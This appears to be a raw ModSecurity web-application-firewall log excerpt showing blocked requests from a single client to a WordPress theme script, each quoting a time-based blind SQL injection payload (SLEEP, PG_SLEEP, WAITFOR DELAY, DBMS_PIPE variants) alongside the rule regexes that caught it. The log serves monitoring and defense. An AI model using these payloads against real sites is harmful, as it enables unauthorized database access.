AND ('yBpM'='yBpM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1og1VuGGNTxm_kiOEuAAAANM"] [Sat Aug 31 01:18:10.990601 2024] [:error] [pid 8676:tid 140590326941440] [client 193.29.13.20:37746] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47' AND SLEEP(5) AND 'uzik'='uzik"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1omm8LEssXUq6wJ2LLQAAAJM"] [Sat Aug 31 01:18:11.296149 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37750] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47%' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ow1VuGGNTxm_kiOEuQAAAMs"] [Sat Aug 31 01:18:11.597043 2024] [:error] [pid 8672:tid 140590284977920] [client 193.29.13.20:37752] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47 AND SLEEP(5)-- fnVk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ow3r8UJC0kxJCKSq6wAAABg"] [Sat Aug 31 01:18:11.908188 2024] [:error] [pid 8675:tid 140590444439296] [client 193.29.13.20:37754] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47) AND 6574=(SELECT 6574 FROM PG_SLEEP(5)) AND (7011=7011"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1o5dLCjsWrLhZKAOZcgAAAEU"] [Sat Aug 31 01:18:12.238458 2024] [:error] [pid 9366:tid 140590427653888] [client 193.29.13.20:37756] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47 AND 6574=(SELECT 6574 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pA1VuGGNTxm_kiOEugAAAMc"] [Sat Aug 31 01:18:12.540310 2024] [:error] [pid 8675:tid 140590310156032] [client 193.29.13.20:37758] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47') AND 6574=(SELECT 6574 FROM PG_SLEEP(5)) AND ('tPgW'='tPgW"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pJdLCjsWrLhZKAOZcwAAAFU"] [Sat Aug 31 01:18:12.844796 2024] [:error] [pid 8675:tid 140590293370624] [client 193.29.13.20:37760] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47' AND 6574=(SELECT 6574 FROM PG_SLEEP(5)) AND 'nCNE'='nCNE"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pJdLCjsWrLhZKAOZdAAAAFc"] [Sat Aug 31 01:18:13.153406 2024] [:error] [pid 9366:tid 140590284977920] [client 193.29.13.20:37762] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47%' AND 6574=(SELECT 6574 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pQ1VuGGNTxm_kiOEuwAAANg"] [Sat Aug 31 01:18:13.463239 2024] [:error] [pid 9366:tid 140590540097280] [client 193.29.13.20:37764] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47 AND 6574=(SELECT 6574 FROM PG_SLEEP(5))-- FvmO"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pQ1VuGGNTxm_kiOEvAAAAMI"] [Sat Aug 31 01:18:13.774998 2024] [:error] [pid 9366:tid 140590377297664] [client 193.29.13.20:37766] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47) WAITFOR DELAY '0:0:5' AND (8044=8044"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pQ1VuGGNTxm_kiOEvQAAAM0"] [Sat Aug 31 01:18:14.104017 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:37768] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47 WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pg1VuGGNTxm_kiOEvgAAAMo"] [Sat Aug 31 01:18:14.431100 2024] [:error] [pid 8675:tid 140590360512256] [client 193.29.13.20:37770] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47') WAITFOR DELAY '0:0:5' AND ('EUCM'='EUCM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ppdLCjsWrLhZKAOZdQAAAE8"] [Sat Aug 31 01:18:14.727237 2024] [:error] [pid 9366:tid 140590310156032] [client 193.29.13.20:37772] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47' WAITFOR DELAY '0:0:5' AND 'iXtY'='iXtY"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pg1VuGGNTxm_kiOEvwAAANU"] [Sat Aug 31 01:18:15.037665 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:37774] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47%' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pw1VuGGNTxm_kiOEwAAAAM4"] [Sat Aug 31 01:18:15.339101 2024] [:error] [pid 8672:tid 140590436046592] [client 193.29.13.20:37776] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47 WAITFOR DELAY '0:0:5'-- EOnH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pw3r8UJC0kxJCKSq7AAAAAY"] [Sat Aug 31 01:18:15.648332 2024] [:error] [pid 8672:tid 140590444439296] [client 193.29.13.20:37778] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 2105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(82)||CHR(114)||CHR(117),5) AND (8296=8296"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pw3r8UJC0kxJCKSq7QAAAAU"] [Sat Aug 31 01:18:15.950082 2024] [:error] [pid 9366:tid 140590531704576] [client 193.29.13.20:37780] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 2105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(82)||CHR(114)||CHR(117),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1pw1VuGGNTxm_kiOEwQAAAMM"] [Sat Aug 31 01:18:16.263318 2024] [:error] [pid 9366:tid 140590452832000] [client 193.29.13.20:37782] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 2105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(82)||CHR(114)||CHR(117),5) AND ('oFlX'='oFlX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qA1VuGGNTxm_kiOEwgAAAMQ"] [Sat Aug 31 01:18:16.591973 2024] [:error] [pid 8676:tid 140590352119552] [client 193.29.13.20:37784] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 2105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(82)||CHR(114)||CHR(117),5) AND 'Mxfz'='Mxfz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qGm8LEssXUq6wJ2LLgAAAJA"] [Sat Aug 31 01:18:16.889466 2024] [:error] [pid 8675:tid 140590402475776] [client 193.29.13.20:37786] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 2105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(82)||CHR(114)||CHR(117),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qJdLCjsWrLhZKAOZdgAAAEo"] [Sat Aug 31 01:18:17.189493 2024] [:error] [pid 8675:tid 140590335334144] [client 193.29.13.20:37788] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 2105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(82)||CHR(114)||CHR(117),5)-- vJHI"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] 